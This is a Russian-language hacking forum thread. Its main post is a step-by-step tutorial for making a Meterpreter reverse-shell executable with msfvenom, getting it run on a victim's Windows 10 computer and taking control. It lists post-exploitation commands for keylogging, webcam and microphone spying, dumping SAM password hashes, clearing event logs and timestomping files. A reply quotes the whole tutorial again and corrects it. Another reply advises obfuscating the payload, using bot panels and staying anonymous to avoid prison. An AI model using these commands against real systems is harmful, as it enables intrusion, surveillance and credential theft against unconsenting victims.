DE-RASHER

Новичок
Статус
offline
Регистрация
26.10.2019
Сообщения
5
Репутация
4
Я не побуждаю вас к незаконной деятельности
Я лишь рассказываю о том, как можно защититься
Я не несу ответственности за ваши поступки

Получение удаленного доступа (по локально сети) к windows 10 | kali linux

Windows 10 - одна из самых распространенных операционных систем, у неё безусловно очень мощная защита,
но у всего есть свои уязвимости.
Хотя компьютер вирус и видит, но если хорошенько зашифровать exe файл, то можно добиться и более утонченного результата.
Сегодня же мы просто получим удаленный доступ (по локальной сети) к компьютеру с установленной системой windows 10.
Возможно, можно настроить и так чтобы это было глобально (хотя, я и догадываюсь, как это сделать),
но не сегодня.
Если получиться настроить удаленный доступ глобально, то я напишу новую статью, заточенную конкретно на это, с отсылками на данную запись.

Приступим!

Что нам понадобится:
1. Kali Linux (или любой другой дистрибутив linux, установленным metasploit)
2. Компьютер (на который мы будем кидать вирус)
3. И терпение!

Для начало проверь интернет соединение на первом и втором компьютере. Убедимся что оно есть (работает), и то, что оба устройства подключены к одной сети

Далее на устройстве с linux откроем терминал и прописываем следующую команду
Код:
ifconfig
с помощью этой команды мы сможем узнать локальный ip адрес устройства linux
в зависимости от вашего подключения смотрим на определенный абзац.
Если у вас wi-fi по кабелю (eth0), то ищем наш ip там,
если у вас беспроводное соединение (wlan0), то ip адрес ищем в абзаце с wlan0
v4-728px-Check-the-IP-Address-in-Linux-Step-5.jpg


*После inet*

ip адрес мы должны запомнить, или скопировать
Далее переходим в metasploit, для этого клацаем на картинку М в меню сбоку или в консоли прописываем
Код:
msfconsole

Далее вводим следующую команду:
Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=здесь вставляем ip -f exe -o здесь путь/файл.exe
ПРИМЕР
Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o root/Desktop/file.exe

Далее перебрасываем файл на атакуемый компьютер
После этого возвращаемся к metasploit, и набираем следующее
Код:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp
После вводим
Код:
show options
И видим, что LHOST - неизвестный, чтобы его добавить, пишем
Код:
set LHOST здесь ip
ПРИМЕР
Код:
set LHOST 192.168.0.4
Далее запустим процесс ожидания запуска вируса в фоновом режиме
Код:
exploit -j -z

Ну а далее запускаем вирус на атакуемом компьютере
После опять возвращаемся к metasploit и пишем
Код:
session -i 1
(по дефолту сессия 1)

Ну вот и все, мы попали в компьютер

Список команд и их значение:
Системные

Команда Описание
------- -----------
clearev - Очистить журнал событий
drop_token - Отбрасывает любой активный токен имперсонализации.
execute - Выполнить команду
getenv - Получить значение одной или более переменных окружения
getpid - Получить идентификатор текущего процесса
getprivs - Попытаться включить все привилегии, доступные для текущего процесса
getsid - Получение SID пользователя
getuid - Получение имени пользователя
kill - Завершить процесс
localtime - Показать локальную дату и время целевой системы
pgrep - Фильтрация процессов по имени
pkill - Завершить процесс по имени
ps - Список запущенных процессов
reboot - Перезагрузить удалённый компьютер
reg - Изменение и взаимодействие с удалённым регистром
rev2self - Вызов RevertToSelf() на удалённой машине
shell - Перейти в системную командную оболочку
shutdown - Отключить удалённый компьютер
steal_token - Попытаться украсть impersonation token из целевого процесса
suspend - Приостанавливает или возобновляет список процессов
sysinfo - Получает информацию об удалённой системе, такую как вид ОС
Команды пользовательского интерфейса
enumdesktops - Список всех доступных рабочих столов и оконных станций
getdesktop - Получить текущий рабочий стол meterpreter
idletime - Возвращает количество секунд отсутствия активности удалённого пользователя
keyscan_dump - Дамп буфера нажатия клавиш
keyscan_start - Запустить захват нажатие клавиш
keyscan_stop - Остановить захват нажатия клавиш
screenshot - Получение скриншота интерактивного рабочего стола
setdesktop - Изменение текущего рабочего стола meterpreters
uictl - Контроль некоторых компонентов пользовательских интерфейсов
Команды для управления веб-камерой
Команда Описание
------- -----------
record_mic - Запись аудио со стандартного микрофона в течение X секунд
webcam_chat - Начать видеочат
webcam_list - Вывести список веб-камер
webcam_snap - Сделать снимок указанной веб-камерой
webcam_stream - Запустить выдиопоток с выбранной веб-камеры


Команды вывода аудио:
1
2
3
Команда Описание
------- -----------
play - воспроизвести аудио файл на целевой системе, на диск ничего не записывается

Команды повышения привилегий:
1
2
3
Команда Описание
------- -----------
getsystem - Пытается поднять ваши привилегии на данной локальной системе.

Команда для работы с базой данных паролей:
1
2
3
Команда Описание
------- -----------
hashdump - Дампит содержимое базы данных SAM

Команды для работы с Timestomp (временными метками файла):
1
2
3
Команда Описание
------- -----------
timestomp - Манипуляция файловыми атрибутами MACE


У меня все, спасибо что прочитали?
 

Panda013

Участник
Статус
offline
Регистрация
28.01.2019
Сообщения
51
Репутация
16
годно годно. Спасибо)
 

MoRu$eR

Продавец
Статус
offline
Регистрация
19.11.2018
Сообщения
356
Репутация
564
Я не побуждаю вас к незаконной деятельности
Я лишь рассказываю о том, как можно защититься
Я не несу ответственности за ваши поступки

Получение удаленного доступа (по локально сети) к windows 10 | kali linux

Windows 10 - одна из самых распространенных операционных систем, у неё безусловно очень мощная защита,
но у всего есть свои уязвимости.
Хотя компьютер вирус и видит, но если хорошенько зашифровать exe файл, то можно добиться и более утонченного результата.
Сегодня же мы просто получим удаленный доступ (по локальной сети) к компьютеру с установленной системой windows 10.
Возможно, можно настроить и так чтобы это было глобально (хотя, я и догадываюсь, как это сделать),
но не сегодня.
Если получиться настроить удаленный доступ глобально, то я напишу новую статью, заточенную конкретно на это, с отсылками на данную запись.

Приступим!

Что нам понадобится:
1. Kali Linux (или любой другой дистрибутив linux, установленным metasploit)
2. Компьютер (на который мы будем кидать вирус)
3. И терпение!

Для начало проверь интернет соединение на первом и втором компьютере. Убедимся что оно есть (работает), и то, что оба устройства подключены к одной сети

Далее на устройстве с linux откроем терминал и прописываем следующую команду
Код:
ifconfig
с помощью этой команды мы сможем узнать локальный ip адрес устройства linux
в зависимости от вашего подключения смотрим на определенный абзац.
Если у вас wi-fi по кабелю (eth0), то ищем наш ip там,
если у вас беспроводное соединение (wlan0), то ip адрес ищем в абзаце с wlan0

ip адрес мы должны запомнить, или скопировать
Далее переходим в metasploit, для этого клацаем на картинку М в меню сбоку или в консоли прописываем
Код:
msfconsole

Далее вводим следующую команду:
Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=здесь вставляем ip -f exe -o здесь путь/файл.exe
ПРИМЕР
Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o root/Desktop/file.exe

Далее перебрасываем файл на атакуемый компьютер
После этого возвращаемся к metasploit, и набираем следующее
Код:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp
После вводим
Код:
show options
И видим, что LHOST - неизвестный, чтобы его добавить, пишем
Код:
set LHOST здесь ip
ПРИМЕР
Код:
set LHOST 192.168.0.4
Далее запустим процесс ожидания запуска вируса в фоновом режиме
Код:
exploit -j -z

Ну а далее запускаем вирус на атакуемом компьютере
После опять возвращаемся к metasploit и пишем
Код:
session -i 1
(по дефолту сессия 1)

Ну вот и все, мы попали в компьютер

Список команд и их значение:
Системные

Команда Описание
------- -----------
clearev - Очистить журнал событий
drop_token - Отбрасывает любой активный токен имперсонализации.
execute - Выполнить команду
getenv - Получить значение одной или более переменных окружения
getpid - Получить идентификатор текущего процесса
getprivs - Попытаться включить все привилегии, доступные для текущего процесса
getsid - Получение SID пользователя
getuid - Получение имени пользователя
kill - Завершить процесс
localtime - Показать локальную дату и время целевой системы
pgrep - Фильтрация процессов по имени
pkill - Завершить процесс по имени
ps - Список запущенных процессов
reboot - Перезагрузить удалённый компьютер
reg - Изменение и взаимодействие с удалённым регистром
rev2self - Вызов RevertToSelf() на удалённой машине
shell - Перейти в системную командную оболочку
shutdown - Отключить удалённый компьютер
steal_token - Попытаться украсть impersonation token из целевого процесса
suspend - Приостанавливает или возобновляет список процессов
sysinfo - Получает информацию об удалённой системе, такую как вид ОС
Команды пользовательского интерфейса
enumdesktops - Список всех доступных рабочих столов и оконных станций
getdesktop - Получить текущий рабочий стол meterpreter
idletime - Возвращает количество секунд отсутствия активности удалённого пользователя
keyscan_dump - Дамп буфера нажатия клавиш
keyscan_start - Запустить захват нажатие клавиш
keyscan_stop - Остановить захват нажатия клавиш
screenshot - Получение скриншота интерактивного рабочего стола
setdesktop - Изменение текущего рабочего стола meterpreters
uictl - Контроль некоторых компонентов пользовательских интерфейсов
Команды для управления веб-камерой
Команда Описание
------- -----------
record_mic - Запись аудио со стандартного микрофона в течение X секунд
webcam_chat - Начать видеочат
webcam_list - Вывести список веб-камер
webcam_snap - Сделать снимок указанной веб-камерой
webcam_stream - Запустить выдиопоток с выбранной веб-камеры


Команды вывода аудио:
1
2
3
Команда Описание
------- -----------
play - воспроизвести аудио файл на целевой системе, на диск ничего не записывается

Команды повышения привилегий:
1
2
3
Команда Описание
------- -----------
getsystem - Пытается поднять ваши привилегии на данной локальной системе.

Команда для работы с базой данных паролей:
1
2
3
Команда Описание
------- -----------
hashdump - Дампит содержимое базы данных SAM

Команды для работы с Timestomp (временными метками файла):
1
2
3
Команда Описание
------- -----------
timestomp - Манипуляция файловыми атрибутами MACE


У меня все, спасибо что прочитали?
Тема стараяя, всё довольно таки просто, но молодец, что написал.

Только сначала ты должен запустить "msfvenom" для создания Полезной нагрузки, а уже потом запустить Консоль Метасплоита.

UPD: Не сразу увидел.. Ты забыл про порт.
 

Pupkin

Новичок
Статус
offline
Регистрация
29.06.2018
Сообщения
17
Репутация
13
все годно на потестить у себя и посмотреть как работает при отключенном антивирусе. потом уже переходишь к обфускации полезной нагрузки, дэдикам с ботпанелями и остальным полезным фичам, и если хватит мозга на анонимность то может даже не посадют на бутылку